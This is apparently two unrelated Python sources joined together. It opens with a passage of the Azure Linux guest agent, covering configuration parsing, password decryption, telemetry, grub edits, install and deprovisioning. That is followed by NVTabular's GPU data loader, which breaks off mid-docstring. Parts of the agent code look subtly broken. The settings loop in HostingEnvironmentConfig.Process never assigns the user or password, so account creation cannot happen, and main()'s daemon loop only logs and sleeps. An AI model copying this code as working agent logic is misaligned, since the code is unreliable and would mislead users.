") agg_status_obj = {"handlerName": name, "handlerVersion": version, "status": agg_state, "runtimeSettingsStatus": {"sequenceNumber": current_seq_no}} if status_obj: agg_status_obj["runtimeSettingsStatus"]["settingsStatus"] = status_obj if status_code != None: agg_status_obj["code"] = status_code if formatted_message: agg_status_obj["formattedMessage"] = formatted_message if localized_message: agg_status_obj["message"] = localized_message agg_status_string = json.dumps(agg_status_obj) LogIfVerbose("Handler Aggregated Status:" + agg_status_string) return agg_status_string def SetHandlerState(self, handler, state=''): zip_dir = LibDir + "/" + handler mfile = None for root, dirs, files in os.walk(zip_dir): for f in files: if f in ('HandlerManifest.json'): mfile = os.path.join(root, f) if mfile != None: break if mfile == None: Error('SetHandlerState(): HandlerManifest.json not found, cannot set HandlerState.') return None Log("SetHandlerState: " + handler + ", " + state) return SetFileContents(os.path.dirname(mfile) + '/config/HandlerState', state) def GetHandlerState(self, handler): handlerState = GetFileContents(handler + '/config/HandlerState') if (handlerState): return handlerState.rstrip('\r\n') else: return 'NotInstalled' class HostingEnvironmentConfig(object): """ Parse Hosting enviromnet config and store in HostingEnvironmentConfig.xml """ # # <HostingEnvironmentConfig version="1.0.0.0" goalStateIncarnation="1"> # <StoredCertificates> # <StoredCertificate name="Stored0Microsoft.WindowsAzure.Plugins.RemoteAccess.PasswordEncryption" certificateId="sha1:C093FA5CD3AAE057CB7C4E04532B2E16E07C26CA" storeName="My" configurationLevel="System" /> # </StoredCertificates> # <Deployment name="db00a7755a5e4e8a8fe4b19bc3b330c3" guid="{ce5a036f-5c93-40e7-8adf-2613631008ab}" incarnation="2"> # <Service name="MyVMRoleService" guid="{00000000-0000-0000-0000-000000000000}" /> # <ServiceInstance name="db00a7755a5e4e8a8fe4b19bc3b330c3.1" guid="{d113f4d7-9ead-4e73-b715-b724b5b7842c}" /> # </Deployment> # <Incarnation number="1" instance="MachineRole_IN_0" guid="{a0faca35-52e5-4ec7-8fd1-63d2bc107d9b}" /> # <Role guid="{73d95f1c-6472-e58e-7a1a-523554e11d46}" name="MachineRole" hostingEnvironmentVersion="1" software="" softwareType="ApplicationPackage" entryPoint="" parameters="" settleTimeSeconds="10" /> # <HostingEnvironmentSettings name="full" Runtime="rd_fabric_stable.110217-1402.RuntimePackage_1.0.0.8.zip"> # <CAS mode="full" /> # <PrivilegeLevel mode="max" /> # <AdditionalProperties><CgiHandlers></CgiHandlers></AdditionalProperties> # </HostingEnvironmentSettings> # <ApplicationSettings> # <Setting name="__ModelData" value="&lt;m role=&quot;MachineRole&quot; xmlns=&quot;urn:azure:m:v1&quot;>&lt;r name=&quot;MachineRole&quot;>&lt;e name=&quot;a&quot; />&lt;e name=&quot;b&quot; />&lt;e name=&quot;Microsoft.WindowsAzure.Plugins.RemoteAccess.Rdp&quot; />&lt;e name=&quot;Microsoft.WindowsAzure.Plugins.RemoteForwarder.RdpInput&quot; />&lt;/r>&lt;/m>" /> # <Setting name="Microsoft.WindowsAzure.Plugins.Diagnostics.ConnectionString" value="DefaultEndpointsProtocol=http;AccountName=osimages;AccountKey=DNZQ..." 
/> # <Setting name="Microsoft.WindowsAzure.Plugins.RemoteForwarder.Enabled" value="true" /> # </ApplicationSettings> # <ResourceReferences> # <Resource name="DiagnosticStore" type="directory" request="Microsoft.Cis.Fabric.Controller.Descriptions.ServiceDescription.Data.Policy" sticky="true" size="1" path="db00a7755a5e4e8a8fe4b19bc3b330c3.MachineRole.DiagnosticStore\" disableQuota="false" /> # </ResourceReferences> # </HostingEnvironmentConfig> # def __init__(self): self.reinitialize() def reinitialize(self): """ Reset Members. """ self.StoredCertificates = None self.Deployment = None self.Incarnation = None self.Role = None self.HostingEnvironmentSettings = None self.ApplicationSettings = None self.Certificates = None self.ResourceReferences = None def Parse(self, xmlText): """ Parse and create HostingEnvironmentConfig.xml. """ self.reinitialize() SetFileContents("HostingEnvironmentConfig.xml", xmlText) dom = xml.dom.minidom.parseString(xmlText) for a in ["HostingEnvironmentConfig", "Deployment", "Service", "ServiceInstance", "Incarnation", "Role", ]: if not dom.getElementsByTagName(a): Error("HostingEnvironmentConfig.Parse: Missing " + a) return None node = dom.childNodes[0] if node.localName != "HostingEnvironmentConfig": Error("HostingEnvironmentConfig.Parse: root not HostingEnvironmentConfig") return None self.ApplicationSettings = dom.getElementsByTagName("Setting") self.Certificates = dom.getElementsByTagName("StoredCertificate") return self def DecryptPassword(self, e): """ Return decrypted password. """ SetFileContents("password.p7m", "MIME-Version: 1.0\n" + "Content-Disposition: attachment; filename=\"password.p7m\"\n" + "Content-Type: application/x-pkcs7-mime; name=\"password.p7m\"\n" + "Content-Transfer-Encoding: base64\n\n" + textwrap.fill(e, 64)) return RunGetOutput(Openssl + " cms -decrypt -in password.p7m -inkey Certificates.pem -recip Certificates.pem")[ 1] def ActivateResourceDisk(self): return MyDistro.ActivateResourceDisk() def Process(self): """ Execute ActivateResourceDisk in separate thread. Create the user account. Launch ConfigurationConsumer if specified in the config. 
""" no_thread = False if DiskActivated == False: for m in inspect.getmembers(MyDistro): if 'ActivateResourceDiskNoThread' in m: no_thread = True break if no_thread == True: MyDistro.ActivateResourceDiskNoThread() else: diskThread = threading.Thread(target=self.ActivateResourceDisk) diskThread.start() User = None Pass = None Expiration = None Thumbprint = None for b in self.ApplicationSettings: sname = b.getAttribute("name") svalue = b.getAttribute("value") if User != None and Pass != None: if User != "root" and User != "" and Pass != "": CreateAccount(User, Pass, Expiration, Thumbprint) else: Error("Not creating user account: " + User) for c in self.Certificates: csha1 = c.getAttribute("certificateId").split(':')[1].upper() if os.path.isfile(csha1 + ".prv"): Log("Private key with thumbprint: " + csha1 + " was retrieved.") if os.path.isfile(csha1 + ".crt"): Log("Public cert with thumbprint: " + csha1 + " was retrieved.") program = Config.get("Role.ConfigurationConsumer") if program != None: try: Children.append(subprocess.Popen([program, LibDir + "/HostingEnvironmentConfig.xml"])) except OSError as e: ErrorWithPrefix('HostingEnvironmentConfig.Process', 'Exception: ' + str(e) + ' occured launching ' + program) class WALAEvent(object): def __init__(self): self.providerId = "" self.eventId = 1 self.OpcodeName = "" self.KeywordName = "" self.TaskName = "" self.TenantName = "" self.RoleName = "" self.RoleInstanceName = "" self.ContainerId = "" self.ExecutionMode = "IAAS" self.OSVersion = "" self.GAVersion = "" self.RAM = 0 self.Processors = 0 def ToXml(self): strEventid = u'<Event id="{0}"/>'.format(self.eventId) strProviderid = u'<Provider id="{0}"/>'.format(self.providerId) strRecordFormat = u'<Param Name="{0}" Value="{1}" T="{2}" />' strRecordNoQuoteFormat = u'<Param Name="{0}" Value={1} T="{2}" />' strMtStr = u'mt:wstr' strMtUInt64 = u'mt:uint64' strMtBool = u'mt:bool' strMtFloat = u'mt:float64' strEventsData = u"" for attName in self.__dict__: if attName in ["eventId", "filedCount", "providerId"]: continue attValue = self.__dict__[attName] if type(attValue) is int: strEventsData += strRecordFormat.format(attName, attValue, strMtUInt64) continue if type(attValue) is str: attValue = xml.sax.saxutils.quoteattr(attValue) strEventsData += strRecordNoQuoteFormat.format(attName, attValue, strMtStr) continue if str(type(attValue)).count("'unicode'") > 0: attValue = xml.sax.saxutils.quoteattr(attValue) strEventsData += strRecordNoQuoteFormat.format(attName, attValue, strMtStr) continue if type(attValue) is bool: strEventsData += strRecordFormat.format(attName, attValue, strMtBool) continue if type(attValue) is float: strEventsData += strRecordFormat.format(attName, attValue, strMtFloat) continue Log("Warning: property " + attName + ":" + str(type(attValue)) + ":type" + str( type(attValue)) + "Can't convert to events data:" + ":type not supported") return u"<Data>{0}{1}{2}</Data>".format(strProviderid, strEventid, strEventsData) def Save(self): eventfolder = LibDir + "/events" if not os.path.exists(eventfolder): os.mkdir(eventfolder) os.chmod(eventfolder, 0o700) if len(os.listdir(eventfolder)) > 1000: raise Exception("WriteToFolder:Too many file under " + eventfolder + " exit") filename = os.path.join(eventfolder, str(int(time.time() * 1000000))) with open(filename + ".tmp", 'wb+') as hfile: hfile.write(self.ToXml().encode("utf-8")) os.rename(filename + ".tmp", filename + ".tld") class WALAEventOperation: HeartBeat = "HeartBeat" Provision = "Provision" Install = "Install" UnIsntall = "UnInstall" 
Disable = "Disable" Enable = "Enable" Download = "Download" Upgrade = "Upgrade" Update = "Update" def AddExtensionEvent(name, op, isSuccess, duration=0, version="1.0", message="", type="", isInternal=False): event = ExtensionEvent() event.Name = name event.Version = version event.IsInternal = isInternal event.Operation = op event.OperationSuccess = isSuccess event.Message = message event.Duration = duration event.ExtensionType = type try: event.Save() except: Error("Error " + traceback.format_exc()) class ExtensionEvent(WALAEvent): def __init__(self): WALAEvent.__init__(self) self.eventId = 1 self.providerId = "69B669B9-4AF8-4C50-BDC4-6006FA76E975" self.Name = "" self.Version = "" self.IsInternal = False self.Operation = "" self.OperationSuccess = True self.ExtensionType = "" self.Message = "" self.Duration = 0 class WALAEventMonitor(WALAEvent): def __init__(self, postMethod): WALAEvent.__init__(self) self.post = postMethod self.sysInfo = {} self.eventdir = LibDir + "/events" self.issysteminfoinitilized = False def StartEventsLoop(self): eventThread = threading.Thread(target=self.EventsLoop) eventThread.setDaemon(True) eventThread.start() def EventsLoop(self): LastReportHeartBeatTime = datetime.datetime.min try: while True: if (datetime.datetime.now() - LastReportHeartBeatTime) > \ datetime.timedelta(minutes=30): LastReportHeartBeatTime = datetime.datetime.now() AddExtensionEvent(op=WALAEventOperation.HeartBeat, name="WALA", isSuccess=True) self.postNumbersInOneLoop = 0 self.CollectAndSendWALAEvents() time.sleep(60) except: Error("Exception in events loop:" + traceback.format_exc()) def SendEvent(self, providerid, events): dataFormat = u'<?xml version="1.0"?><TelemetryData version="1.0"><Provider id="{0}">{1}' \ '</Provider></TelemetryData>' data = dataFormat.format(providerid, events) self.post("/machine/?comp=telemetrydata", data) def CollectAndSendWALAEvents(self): if not os.path.exists(self.eventdir): return # Throtting, can't send more than 3 events in 15 seconds eventSendNumber = 0 eventFiles = os.listdir(self.eventdir) events = {} for file in eventFiles: if not file.endswith(".tld"): continue with open(os.path.join(self.eventdir, file), "rb") as hfile: # if fail to open or delete the file, throw exception xmlStr = hfile.read().decode("utf-8", 'ignore') os.remove(os.path.join(self.eventdir, file)) params = "" eventid = "" providerid = "" # if exception happen during process an event, catch it and continue try: xmlStr = self.AddSystemInfo(xmlStr) for node in xml.dom.minidom.parseString(xmlStr.encode("utf-8")).childNodes[0].childNodes: if node.tagName == "Param": params += node.toxml() if node.tagName == "Event": eventid = node.getAttribute("id") if node.tagName == "Provider": providerid = node.getAttribute("id") except: Error(traceback.format_exc()) continue if len(params) == 0 or len(eventid) == 0 or len(providerid) == 0: Error("Empty filed in params:" + params + " event id:" + eventid + " provider id:" + providerid) continue eventstr = u'<Event id="{0}"><![CDATA[{1}]]></Event>'.format(eventid, params) if not events.get(providerid): events[providerid] = "" if len(events[providerid]) > 0 and len(events.get(providerid) + eventstr) >= 63 * 1024: eventSendNumber += 1 self.SendEvent(providerid, events.get(providerid)) if eventSendNumber % 3 == 0: time.sleep(15) events[providerid] = "" if len(eventstr) >= 63 * 1024: Error("Signle event too large abort " + eventstr[:300]) continue events[providerid] = events.get(providerid) + eventstr for key in events.keys(): if len(events[key]) > 0: 
eventSendNumber += 1 self.SendEvent(key, events[key]) if eventSendNumber % 3 == 0: time.sleep(15) def AddSystemInfo(self, eventData): if not self.issysteminfoinitilized: self.issysteminfoinitilized = True try: self.sysInfo["OSVersion"] = platform.system() + ":" + "-".join(DistInfo(1)) + ":" + platform.release() self.sysInfo["GAVersion"] = GuestAgentVersion self.sysInfo["RAM"] = MyDistro.getTotalMemory() self.sysInfo["Processors"] = MyDistro.getProcessorCores() sharedConfig = xml.dom.minidom.parse("/var/lib/waagent/SharedConfig.xml").childNodes[0] hostEnvConfig = xml.dom.minidom.parse("/var/lib/waagent/HostingEnvironmentConfig.xml").childNodes[0] gfiles = RunGetOutput("ls -t /var/lib/waagent/GoalState.*.xml")[1] goalStateConfi = xml.dom.minidom.parse(gfiles.split("\n")[0]).childNodes[0] self.sysInfo["TenantName"] = hostEnvConfig.getElementsByTagName("Deployment")[0].getAttribute("name") self.sysInfo["RoleName"] = hostEnvConfig.getElementsByTagName("Role")[0].getAttribute("name") self.sysInfo["RoleInstanceName"] = sharedConfig.getElementsByTagName("Instance")[0].getAttribute("id") self.sysInfo["ContainerId"] = goalStateConfi.getElementsByTagName("ContainerId")[0].childNodes[ 0].nodeValue except: Error(traceback.format_exc()) eventObject = xml.dom.minidom.parseString(eventData.encode("utf-8")).childNodes[0] for node in eventObject.childNodes: if node.tagName == "Param": name = node.getAttribute("Name") if self.sysInfo.get(name): node.setAttribute("Value", xml.sax.saxutils.escape(str(self.sysInfo[name]))) return eventObject.toxml() WaagentLogrotate = """\ /var/log/waagent.log { monthly rotate 6 notifempty missingok } """ def GetMountPoint(mountlist, device): """ Example of mountlist: /dev/sda1 on / type ext4 (rw) proc on /proc type proc (rw) sysfs on /sys type sysfs (rw) devpts on /dev/pts type devpts (rw,gid=5,mode=620) tmpfs on /dev/shm type tmpfs (rw,rootcontext="system_u:object_r:tmpfs_t:s0") none on /proc/sys/fs/binfmt_misc type binfmt_misc (rw) /dev/sdb1 on /mnt/resource type ext4 (rw) """ if (mountlist and device): for entry in mountlist.split('\n'): if (re.search(device, entry)): tokens = entry.split() # Return the 3rd column of this line return tokens[2] if len(tokens) > 2 else None return None def FindInLinuxKernelCmdline(option): """ Return match object if 'option' is present in the kernel boot options of the grub configuration. """ m = None matchs = r'^.*?' + MyDistro.grubKernelBootOptionsLine + r'.*?' + option + r'.*$' try: m = FindStringInFile(MyDistro.grubKernelBootOptionsFile, matchs) except IOError as e: Error( 'FindInLinuxKernelCmdline: Exception opening ' + MyDistro.grubKernelBootOptionsFile + 'Exception:' + str(e)) return m def AppendToLinuxKernelCmdline(option): """ Add 'option' to the kernel boot options of the grub configuration. """ if not FindInLinuxKernelCmdline(option): src = r'^(.*?' + MyDistro.grubKernelBootOptionsLine + r')(.*?)("?)$' rep = r'\1\2 ' + option + r'\3' try: ReplaceStringInFile(MyDistro.grubKernelBootOptionsFile, src, rep) except IOError as e: Error( 'AppendToLinuxKernelCmdline: Exception opening ' + MyDistro.grubKernelBootOptionsFile + 'Exception:' + str( e)) return 1 Run("update-grub", chk_err=False) return 0 def RemoveFromLinuxKernelCmdline(option): """ Remove 'option' to the kernel boot options of the grub configuration. """ if FindInLinuxKernelCmdline(option): src = r'^(.*?' 
+ MyDistro.grubKernelBootOptionsLine + r'.*?)(' + option + r')(.*?)("?)$' rep = r'\1\3\4' try: ReplaceStringInFile(MyDistro.grubKernelBootOptionsFile, src, rep) except IOError as e: Error( 'RemoveFromLinuxKernelCmdline: Exception opening ' + MyDistro.grubKernelBootOptionsFile + 'Exception:' + str( e)) return 1 Run("update-grub", chk_err=False) return 0 def FindStringInFile(fname, matchs): """ Return match object if found in file. """ try: ms = re.compile(matchs) for l in (open(fname, 'r')).readlines(): m = re.search(ms, l) if m: return m except: raise return None def ReplaceStringInFile(fname, src, repl): """ Replace 'src' with 'repl' in file. """ try: sr = re.compile(src) if FindStringInFile(fname, src): updated = '' for l in (open(fname, 'r')).readlines(): n = re.sub(sr, repl, l) updated += n ReplaceFileContentsAtomic(fname, updated) except: raise return def ApplyVNUMAWorkaround(): """ If kernel version has NUMA bug, add 'numa=off' to kernel boot options. """ VersionParts = platform.release().replace('-', '.').split('.') if int(VersionParts[0]) > 2: return if int(VersionParts[1]) > 6: return if int(VersionParts[2]) > 37: return if AppendToLinuxKernelCmdline("numa=off") == 0: Log("Your kernel version " + platform.release() + " has a NUMA-related bug: NUMA has been disabled.") else: Error("Error adding 'numa=off'. NUMA has not been disabled.") def RevertVNUMAWorkaround(): """ Remove 'numa=off' from kernel boot options. """ if RemoveFromLinuxKernelCmdline("numa=off") == 0: Log('NUMA has been re-enabled') else: Log('NUMA has not been re-enabled') def Install(): """ Install the agent service. Check dependencies. Create /etc/waagent.conf and move old version to /etc/waagent.conf.old Copy RulesFiles to /var/lib/waagent Create /etc/logrotate.d/waagent Set /etc/ssh/sshd_config ClientAliveInterval to 180 Call ApplyVNUMAWorkaround() """ if MyDistro.checkDependencies(): return 1 os.chmod(sys.argv[0], 0o755) SwitchCwd() for a in RulesFiles: if os.path.isfile(a): if os.path.isfile(GetLastPathElement(a)): os.remove(GetLastPathElement(a)) shutil.move(a, ".") Warn("Moved " + a + " -> " + LibDir + "/" + GetLastPathElement(a)) MyDistro.registerAgentService() if os.path.isfile("/etc/waagent.conf"): try: os.remove("/etc/waagent.conf.old") except: pass try: os.rename("/etc/waagent.conf", "/etc/waagent.conf.old") Warn("Existing /etc/waagent.conf has been renamed to /etc/waagent.conf.old") except: pass SetFileContents("/etc/waagent.conf", MyDistro.waagent_conf_file) SetFileContents("/etc/logrotate.d/waagent", WaagentLogrotate) filepath = "/etc/ssh/sshd_config" ReplaceFileContentsAtomic(filepath, "\n".join(filter(lambda a: not a.startswith("ClientAliveInterval"), GetFileContents(filepath).split( '\n'))) + "\nClientAliveInterval 180\n") Log("Configured SSH client probing to keep connections alive.") ApplyVNUMAWorkaround() return 0 def GetMyDistro(dist_class_name=''): """ Return MyDistro object. NOTE: Logging is not initialized at this point. """ if dist_class_name == '': if 'Linux' in platform.system(): Distro = DistInfo()[0] else: # I know this is not Linux! if 'FreeBSD' in platform.system(): Distro = platform.system() Distro = Distro.strip('"') Distro = Distro.strip(' ') dist_class_name = Distro + 'Distro' else: Distro = dist_class_name if dist_class_name not in globals(): ##print Distro + ' is not a supported distribution.' return None return globals()[dist_class_name]() # the distro class inside this module.
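# --- Illustrative sketch (not part of the original agent; names below are hypothetical) ---
# GetMyDistro() above is a small factory: it takes the distro name reported by DistInfo()
# (e.g. "Ubuntu"), appends "Distro" to form a class name ("UbuntuDistro"), and resolves
# that name through globals(). The self-contained demo below mirrors that lookup with a
# stand-in registry so the resolution rule can be checked without the real distro classes.
def _demo_distro_lookup(distro_name='Ubuntu'):
    class UbuntuDistro(object):                 # hypothetical stand-in for a real distro class
        grubKernelBootOptionsFile = '/boot/grub/menu.lst'

    registry = {'UbuntuDistro': UbuntuDistro}   # plays the role of globals() in GetMyDistro()
    dist_class_name = distro_name + 'Distro'    # same "<Distro>Distro" naming rule as above
    cls = registry.get(dist_class_name)
    return cls() if cls is not None else None   # None mirrors the unsupported-distro branch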
def DistInfo(fullname=0): try: if 'FreeBSD' in platform.system(): release = re.sub('\-.*\Z', '', str(platform.release())) distinfo = ['FreeBSD', release] return distinfo if 'linux_distribution' in dir(platform): distinfo = list(platform.linux_distribution(full_distribution_name=0)) # remove trailing whitespace in distro name if(distinfo[0] == ''): osfile= open("/etc/os-release", "r") for line in osfile: lists=str(line).split("=") if(lists[0]== "NAME"): distname = lists[1].split("\"") distinfo[0] = distname[1] if(distinfo[0].lower() == "sles"): distinfo[0] = "SuSE" osfile.close() distinfo[0] = distinfo[0].strip() return distinfo else: return platform.dist() except Exception as e: errMsg = 'Failed to retrieve the distinfo with error: %s, stack trace: %s' % (str(e), traceback.format_exc()) logger.log(errMsg) distinfo = ['Abstract','1.0'] return distinfo def PackagedInstall(buildroot): """ Called from setup.py for use by RPM. Generic implementation Creates directories and files /etc/waagent.conf, /etc/init.d/waagent, /usr/sbin/waagent, /etc/logrotate.d/waagent, /etc/sudoers.d/waagent under buildroot. Copies generated files waagent.conf, into place and exits. """ MyDistro = GetMyDistro() if MyDistro == None: sys.exit(1) MyDistro.packagedInstall(buildroot) def LibraryInstall(buildroot): pass def Uninstall(): """ Uninstall the agent service. Copy RulesFiles back to original locations. Delete agent-related files. Call RevertVNUMAWorkaround(). """ SwitchCwd() for a in RulesFiles: if os.path.isfile(GetLastPathElement(a)): try: shutil.move(GetLastPathElement(a), a) Warn("Moved " + LibDir + "/" + GetLastPathElement(a) + " -> " + a) except: pass MyDistro.unregisterAgentService() MyDistro.uninstallDeleteFiles() RevertVNUMAWorkaround() return 0 def Deprovision(force, deluser): """ Remove user accounts created by provisioning. Disables root password if Provisioning.DeleteRootPassword = 'y' Stop agent service. Remove SSH host keys if they were generated by the provision. Set hostname to 'localhost.localdomain'. Delete cached system configuration files in /var/lib and /var/lib/waagent. """ # Append blank line at the end of file, so the ctime of this file is changed every time Run("echo ''>>" + MyDistro.getConfigurationPath()) SwitchCwd() print("WARNING! The waagent service will be stopped.") print("WARNING! All SSH host key pairs will be deleted.") print("WARNING! Cached DHCP leases will be deleted.") MyDistro.deprovisionWarnUser() delRootPass = Config.get("Provisioning.DeleteRootPassword") if delRootPass != None and delRootPass.lower().startswith("y"): print("WARNING! root password will be disabled. You will not be able to login as root.") try: input = raw_input except NameError: pass if force == False and not input('Do you want to proceed (y/n)? ').startswith('y'): return 1 MyDistro.stopAgentService() # Remove SSH host keys regenerateKeys = Config.get("Provisioning.RegenerateSshHostKeyPair") if regenerateKeys == None or regenerateKeys.lower().startswith("y"): Run("rm -f /etc/ssh/ssh_host_*key*") # Remove root password if delRootPass != None and delRootPass.lower().startswith("y"): MyDistro.deleteRootPassword() # Remove distribution specific networking configuration MyDistro.publishHostname('localhost.localdomain') MyDistro.deprovisionDeleteFiles() return 0 def SwitchCwd(): """ Switch to cwd to /var/lib/waagent. Create if not present. """ CreateDir(LibDir, "root", 0o700) os.chdir(LibDir) def Usage(): """ Print the arguments to waagent. 
""" print("usage: " + sys.argv[ 0] + " [-verbose] [-force] [-help|-install|-uninstall|-deprovision[+user]|-version|-serialconsole|-daemon]") return 0 def main(): """ Instantiate MyDistro, exit if distro class is not defined. Parse command-line arguments, exit with usage() on error. Instantiate ConfigurationProvider. Call appropriate non-daemon methods and exit. If daemon mode, enter Agent.Run() loop. """ if GuestAgentVersion == "": print("WARNING! This is a non-standard agent that does not include a valid version string.") if len(sys.argv) == 1: sys.exit(Usage()) LoggerInit('/var/log/waagent.log', '/dev/console') global LinuxDistro LinuxDistro = DistInfo()[0] global MyDistro MyDistro = GetMyDistro() if MyDistro == None: sys.exit(1) args = [] conf_file = None global force force = False for a in sys.argv[1:]: if re.match("^([-/]*)(help|usage|\?)", a): sys.exit(Usage()) elif re.match("^([-/]*)version", a): print(GuestAgentVersion + " running on " + LinuxDistro) sys.exit(0) elif re.match("^([-/]*)verbose", a): myLogger.verbose = True elif re.match("^([-/]*)force", a): force = True elif re.match("^(?:[-/]*)conf=.+", a): conf_file = re.match("^(?:[-/]*)conf=(.+)", a).groups()[0] elif re.match("^([-/]*)(setup|install)", a): sys.exit(MyDistro.Install()) elif re.match("^([-/]*)(uninstall)", a): sys.exit(Uninstall()) else: args.append(a) global Config Config = ConfigurationProvider(conf_file) logfile = Config.get("Logs.File") if logfile is not None: myLogger.file_path = logfile logconsole = Config.get("Logs.Console") if logconsole is not None and logconsole.lower().startswith("n"): myLogger.con_path = None verbose = Config.get("Logs.Verbose") if verbose != None and verbose.lower().startswith("y"): myLogger.verbose = True global daemon daemon = False for a in args: if re.match("^([-/]*)deprovision\+user", a): sys.exit(Deprovision(force, True)) elif re.match("^([-/]*)deprovision", a): sys.exit(Deprovision(force, False)) elif re.match("^([-/]*)daemon", a): daemon = True elif re.match("^([-/]*)serialconsole", a): AppendToLinuxKernelCmdline("console=ttyS0 earlyprintk=ttyS0") Log("Configured kernel to use ttyS0 as the boot console.") sys.exit(0) else: print("Invalid command line parameter:" + a) sys.exit(1) if daemon == False: sys.exit(Usage()) global modloaded modloaded = False while True: try: SwitchCwd() Log(GuestAgentLongName + " Version: " + GuestAgentVersion) if IsLinux(): Log("Linux Distribution Detected : " + LinuxDistro) except Exception as e: Error(traceback.format_exc()) Error("Exception: " + str(e)) Log("Restart agent in 15 seconds") time.sleep(15) if __name__ == '__main__': main()
backend.py
# # Copyright (c) 2021, NVIDIA CORPORATION. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. # import math import queue import threading import warnings from collections import OrderedDict import cupy as cp from nvtabular.dispatch import _concat, _is_list_dtype, _make_df, _pull_apart_list from nvtabular.io.shuffle import _shuffle_df from nvtabular.ops import _get_embedding_order def _num_steps(num_samples, step_size): return math.ceil(num_samples / step_size) class ChunkQueue: """This class takes partitions (parts) from an NVTabular dataset and concatenates them into a cudf dataframe "chunk". This chunk is subsequently transformed into its tensor representation using the iterator's transform. Parameters ----------- qsize: int Max number of elements to hold in the buffer at once num_parts : int number of partitions from the iterator, an NVTabular Dataset to concatenate into a "chunk" shuffle : bool enable/disable chunk-level shuffling put_wait: float amount of timeout to wait for a full queue to open up before checking for errors and trying again """ def __init__(self, dataloader, qsize, num_parts=1, shuffle=False, put_wait=1e-6): self.num_parts = num_parts self.shuffle = shuffle self.put_wait = put_wait self.q_out = queue.Queue(qsize) self._stop_event = threading.Event() indices = dataloader._gather_indices_for_dev(0) self.itr = dataloader.data.to_iter(indices=indices) self.dataloader = dataloader def __len__(self): return len(self.itr) @property def stopped(self): return self._stop_event.is_set() @property def empty(self): return self.q_out.empty() def get(self): return self.q_out.get() def put(self, packet): while True: if self.stopped: return True try: self.q_out.put(packet, timeout=self.put_wait) return False except queue.Full: continue def batch(self, itr): """ iterates through gpu_mem_frac size chunks of dataset and concatenates every `num_parts` of them. """ current = [] while True: try: value = next(itr) except StopIteration: if len(current) > 0: yield current break current.append(value) if len(current) == self.num_parts: yield current current = [] def chunk_logic(self, itr): spill = None for chunks in self.batch(itr): if self.stopped: return if spill and not spill.empty: chunks.insert(0, spill) chunks = _concat(chunks) chunks.reset_index(drop=True, inplace=True) chunks, spill = self.get_batch_div_chunk(chunks, self.dataloader.batch_size) if self.shuffle: chunks = _shuffle_df(chunks) if len(chunks) > 0: chunks = self.dataloader.make_tensors(chunks, self.dataloader._use_nnz) # put returns True if buffer is stopped before # packet can be put in queue. 
Keeps us from # freezing on a put on a full queue if self.put(chunks): return chunks = None # takes care final batch, which is less than batch size if not self.dataloader.drop_last and spill is not None and not spill.empty: spill = self.dataloader.make_tensors(spill, self.dataloader._use_nnz) self.put(spill) def load_chunks(self, dev): try: itr = iter(self.itr) if self.dataloader.device != "cpu": with self.dataloader._get_device_ctx(dev): self.chunk_logic(itr) else: self.chunk_logic(itr) except Exception as e: # pylint: disable=broad-except self.put(e) # For when an iterator is stopped before iteration is complete. def stop(self): self._stop_event.set() # TODO: should we be clearing? I can imagine a world where # you want the thread to stop but still want to grab # data out of the buffer self.q_out.queue.clear() def start(self): self._stop_event.clear() def get_batch_div_chunk(self, chunks, batch_size): # TODO: is there a way to do this using cupy? spill_idx = int(chunks.shape[0] / batch_size) * batch_size spill = _make_df(chunks.iloc[spill_idx:]) chunks = _make_df(chunks.iloc[:spill_idx]) if not chunks.empty: chunks.reset_index(drop=True, inplace=True) if not spill.empty: spill.reset_index(drop=True, inplace=True) return chunks, spill # TODO: implement as metaclass and assign methods to children # to avoid having to do Dataset.<method> calls? class DataLoader: _use_nnz = False def __init__( self, dataset, cat_names, cont_names, label_names, batch_size, shuffle, seed_fn=None, parts_per_chunk=1, device=None, global_size=None, global_rank=None, drop_last=False, sparse_names=None, sparse_max=None, sparse_as_dense=False, ): self.data = dataset self.indices = cp.arange(dataset.to_ddf().npartitions) self.drop_last = drop_last self.device = device or 0 self.sparse_names = sparse_names or [] self.sparse_max = sparse_max or {} self.sparse_as_dense = sparse_as_dense self.global_size = global_size or 1 self.global_rank = global_rank or 0 self.cat_names = cat_names or [] self.cont_names = cont_names or [] self.label_names = label_names self.batch_size = batch_size self.shuffle = shuffle self.seed_fn = seed_fn self.num_rows_processed = 0 # we set size of chunk queue to 1 we only want one chunk in queue at a time. self._buff = ChunkQueue(self, 1, num_parts=parts_per_chunk, shuffle=shuffle) # run once instead of everytime len called self._buff_len = len(self._buff) self._batch_itr = None self._workers = None def __len__(self): batches = _num_steps(self._buff_len, self.batch_size) if self.drop_last and self._buff_len % self.batch_size > 0: batches = batches - 1 return batches @property def _working(self): if self._workers is not None: return any(t.is_alive() for t in self._workers) return False def stop(self): # TODO: raise warning or even error if condition # isn't met? 
if self._workers is not None: if not self._buff.stopped: self._buff.stop() for t in self._workers: t.join() # remove joined threads from list self._workers = None self._buff.q_out.queue.clear() self._batch_itr = None def _gather_indices_for_dev(self, dev): # this should be self.indices divided by total processes, global set if len(self.indices) < self.global_size: warnings.warn( f"""You have more processes({self.global_size}) than dataset partitions({len(self.indices)}), reduce the number of processes.""" ) raise IndexError per_worker = _num_steps(len(self.indices), self.global_size) # identify process rank out of all processes (not local rank) start = self.global_rank * per_worker return self.indices[start : start + per_worker].tolist() def _generate_local_seed(self): random_state = cp.random.get_random_state() seeds = random_state.tomaxint(size=self.global_size) local_seed = seeds[self.global_rank] cp.random.seed(local_seed.get()) def _shuffle_indices(self): self._generate_local_seed() if self.seed_fn: new_seed = self.seed_fn() cp.random.seed(new_seed) cp.random.shuffle(self.indices) self._generate_local_seed() def __iter__(self): self.stop() self.num_rows_processed = 0 if self._buff.stopped: self._buff.start() # shuffle partition indices to bring disparate # parts of the dataset "close" to one another if self.shuffle: self._shuffle_indices() # build and start new threads for loading and # concatenating data self._workers = [] t = threading.Thread(target=self._buff.load_chunks, args=(self.device,)) t.daemon = True t.start() self._workers.append(t) return self def __next__(self): return self._get_next_batch() def _fetch_chunk(self): chunks = self._buff.get() if isinstance(chunks, Exception): self.stop() raise chunks self._batch_itr = iter(chunks) def _get_next_batch(self): """ adding this cheap shim so that we can call this step without it getting overridden by the framework-specific parent class's `__next__` method. TODO: can this be better solved with a metaclass implementation? 
